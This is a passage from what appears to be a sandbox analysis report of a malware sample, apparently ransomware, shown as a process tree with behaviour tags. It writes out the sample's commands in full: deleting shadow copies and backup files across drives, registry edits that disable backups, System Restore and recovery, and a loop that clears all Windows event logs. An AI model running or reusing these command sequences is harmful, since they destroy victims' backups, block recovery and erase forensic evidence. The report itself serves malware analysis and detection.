  2⤵
  PID:824
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:1244
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:1768
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:1168
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:1008
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:1968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:212
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
  2⤵
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
  2⤵
  PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
  2⤵
  PID:272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
  2⤵
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
  2⤵
  PID:1100
- - C:\Windows\system32\attrib.exe
    attrib +h +s hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
  2⤵
  PID:1988
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1408
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1736
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1292
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1712
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:824
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:280
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1040
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:812
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:860
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1752
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:1168
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:560
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:884
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:208
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:236
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:212
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:1364
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:844
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1248
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1684
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1704
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:740
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:828
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:668
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Clears Windows event logs
    PID:852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    - Clears Windows event logs
    PID:884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Clears Windows event logs
    PID:1964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Clears Windows event logs
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:1436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    - Clears Windows event logs
    PID:824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    - Clears Windows event logs
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    - Clears Windows event logs
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    - Clears Windows event logs
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    - Clears Windows event logs
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:672
- - C:\Windows\system32\wevtutil.exe
